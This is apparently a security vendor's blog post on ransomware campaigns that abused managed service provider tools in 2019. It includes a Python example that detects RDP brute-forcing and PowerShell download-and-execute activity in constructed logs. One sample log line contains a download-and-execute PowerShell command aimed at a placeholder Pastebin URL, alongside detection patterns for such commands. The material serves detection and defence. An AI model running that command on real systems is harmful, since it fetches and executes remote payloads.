Managed Service Providers (MSPs) are a rapidly growing industry, which provide various software applications and services, including cybersecurity services. Their services appeal to a wide range of organizations, especially to small-medium businesses (SMBs), which cannot otherwise access or maintain these services on their own, due to their size, budget, or manpower limitations.
Due to their extensive customer base, MSPs have become an attractive attack target, as attackers can abuse their systems to reach many different organizations in a short period of time. Attacks against MSPs have escalated within the past several months, with several threat actors abusing different MSP providers to spread ransomware. In an industry-wide survey, 30% of MSP providers stated their main point of concern was cybersecurity and ransomware related incidents. Interestingly, 82% consider antivirus the most relevant security solution for small-medium businesses (SMBs).
This post will overview recent attacks against MSPs, explain why MSPs are an attractive attack surface, and explain how organizations can protect themselves from these types of attacks.
A managed service provider (MSP) provides remote management of a customer’s systems, while sometimes also providing network infrastructure and specialized applications, such as security and network management applications. Due to their limited IT capabilities and budgets, small and medium-sized businesses (SMBs) are typical customers of MSPs, as access to the services they wish to use through the MSP would otherwise be prohibitive.
The MSP market is a rapidly growing one – the managed services market is expected to grow at an annual rate of over 9%, reaching a size of $296 Billion by 2023.
As mentioned above, MSPs provide various services to multiple endpoints, and sometimes multiple customers, simultaneously. Several key factors increase the attack surface of MSP software and make it more susceptible to attack.
In many cases, attackers can gain access to MSP software through public connections of these programs to the Internet and use default or weak credentials to access a program. As MSPs are located remotely from their clients, attackers often look to exploit the connection between the MSP and their clients.
MSP software often runs with high privileges, which enable it to modify customer systems, update, push new files, and edit various system attributes. Due to this, if threat actors are able to access and control MSP software, they are provided with wide access to the targeted MSP’s endpoints, and by using the MSP software they can perform actions on endpoints that require administrative permissions.
Many MSP applications can be termed ‘dual-use tools’, as they have their intended legitimate functionalities which can be repurposed by attackers, such as the ability to download and execute scripts on multiple endpoints. In fact, these tools can be abused to perform a type of file-less attack, “Living-Off-the-Land”, where attackers only use widely-used administrative tools or tools common to the targeted organization, in order to perform the attack. This technique and the reason it is classified as a file-less attack are described in detail in Deep Instinct’s whitepaper “Making Sense of File-less Malware”, published March 2018.
In this typical attack scenario, an attacker might scan the Internet for RDP connections of popular MSP software, brute-force the password to these connections, and connect to an MSP application managing several clients. Then, the attacker can execute a “living-off-the-land” attack by abusing the application in order to push a specific file to all endpoints (this can range from thousands to millions of endpoints), or to set a specific scheduled task or script to run on all the endpoints. This bypasses many security measures, as the MSP software is trusted by the organization, and actions which are performed within its context will usually be considered legitimate.
The increase in attacks abusing MSP software has become very noticeable in the threat landscape. So far, all reported attacks have abused MSP tools to drop ransomware; however, it is likely the same tools were used to drop other types of malware as well. Several attacks were reported during the past few months, and we strongly believe that only a few of them have been made public:
February 2019 – A vulnerability in Kaseya VSA RMM, CVE-2017-18362, was used to spread Gandcrab ransomware in multiple organizations. The root cause of the attack was MSPs that had not updated their versions of Kaseya; Kaseya had released a patch for the vulnerability in late 2017.
April 2019 – following the reported shutting down of Gandcrab, a new ransomware family, Sodinokibi, exploited a zero-day in Oracle’s WebLogic (CVE-2019-2725) to attack MSPs using the program. The vulnerability was exploited to run a PowerShell script on vulnerable systems, which downloaded and ran the ransomware executable.
June 2019 – Sodinokibi strikes again, this time by abusing several MSP tools: Webroot Management Console and Kaseya VSA RMM. In this attack, the operators of the ransomware initially infiltrated organizations through unsecured or badly secured RDP connections, and then used both tools to push PowerShell scripts to all accessible endpoints. The scripts then downloaded a payload from Pastebin, which executed the ransomware and encrypted the endpoints. In some cases the payload was an executable file, executed as part of a file-based attack; in other cases additional scripts were downloaded, as part of a completely file-less attack.
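As an added defender-side example (not Deep Instinct’s code, nor any MSP vendor’s tooling), the detection logic below runs over constructed log lines covering the chain described above: repeated failed RDP logons against a management console, followed by a PowerShell script block on an endpoint that pulls and executes content from Pastebin. Windows event IDs 4625, 4624 and 4104 are real; the host names, the source address and the Pastebin path are placeholders.

```python
import re
from collections import Counter

# Constructed sample events flattened to key=value. 4625 = Windows failed
# logon (logon_type 10 is RDP), 4624 = successful logon, 4104 = PowerShell
# script block. 203.0.113.5 and the Pastebin path are placeholders.
SAMPLE_LOGS = [
    'ts=1 host=rmm-console event=4625 logon_type=10 src=203.0.113.5 user=admin',
    'ts=2 host=rmm-console event=4625 logon_type=10 src=203.0.113.5 user=admin',
    'ts=3 host=rmm-console event=4625 logon_type=10 src=203.0.113.5 user=msp',
    'ts=4 host=rmm-console event=4625 logon_type=10 src=203.0.113.5 user=support',
    'ts=5 host=rmm-console event=4625 logon_type=10 src=203.0.113.5 user=helpdesk',
    'ts=6 host=rmm-console event=4625 logon_type=2 src=10.0.0.8 user=jsmith',
    'ts=7 host=rmm-console event=4624 logon_type=10 src=203.0.113.5 user=helpdesk',
    'ts=8 host=ws-17 event=4104 script="IEX (New-Object Net.WebClient)'
    '.DownloadString(\'https://pastebin.com/raw/PLACEHOLDER\')"',
    'ts=9 host=ws-22 event=4104 script="Get-ChildItem C:\\Logs | Measure-Object"',
]
RDP_FAILURE_THRESHOLD = 5
PAYLOAD_HOSTS = ("pastebin.com",)  # the staging host named in the June 2019 case
EXEC_PATTERN = re.compile(r"\b(IEX|Invoke-Expression|DownloadString|DownloadFile)\b", re.I)
PAIR = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

def parse(line):
    """Split one flattened line into a dict, unquoting quoted values."""
    return {k: (v[1:-1] if v.startswith('"') else v) for k, v in PAIR.findall(line)}

def rdp_bruteforce_sources(events, threshold=RDP_FAILURE_THRESHOLD):
    """Sources with >= threshold failed RDP logons, each tagged with whether
    the same source later logged on successfully over RDP (higher severity)."""
    failures = Counter(e["src"] for e in events
                       if e.get("event") == "4625" and e.get("logon_type") == "10")
    successes = {e["src"] for e in events
                 if e.get("event") == "4624" and e.get("logon_type") == "10"}
    return sorted((src, src in successes) for src, n in failures.items() if n >= threshold)

def suspicious_script_blocks(events):
    """Script blocks that both reach a payload-staging host and execute what they fetch."""
    return [(e["host"], e["script"]) for e in events
            if e.get("event") == "4104"
            and any(h in e.get("script", "").lower() for h in PAYLOAD_HOSTS)
            and EXEC_PATTERN.search(e["script"])]

def analyse(lines=SAMPLE_LOGS):
    """Run both detections over a list of flattened log lines."""
    events = [parse(line) for line in lines]
    return {"rdp_bruteforce": rdp_bruteforce_sources(events),
            "payload_scripts": suspicious_script_blocks(events)}
```

Calling `analyse()` on the sample flags the console brute force (with a later successful RDP logon from the same source) and the single endpoint script that downloads from Pastebin, while the benign script on ws-22 and the non-RDP failure from 10.0.0.8 are ignored.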
Deep Instinct protects its customers from these attacks by preventing them at multiple stages. Deep Instinct’s script control mechanism prevents scripts, including PowerShell scripts, from executing, thus preventing the attack at its first stage. In addition, the deep learning prediction model, ‘D-Brain’, prevents the executable payloads before their execution, meaning the threat is prevented before it can touch any threatened system.
MSPs provide much-needed services and applications to many organizations, especially SMBs, which would otherwise not have access due to size, budget, or manpower limitations. In this period of burgeoning demand, MSPs are expanding their services to offer more value to their customers.
The flip side, however, is that the risk profile of MSPs is also heightened. MSP software has become a target for cyber-criminals, who want to make a profit attacking the huge customer install base of MSPs. Organizations which use MSP software should know how to use this software safely, in order to protect themselves from attacks. To protect your organization, make sure to implement the following security measures:
For more information read Deep Instinct’s whitepaper, Multi-Tenancy Security Solution for MSSPs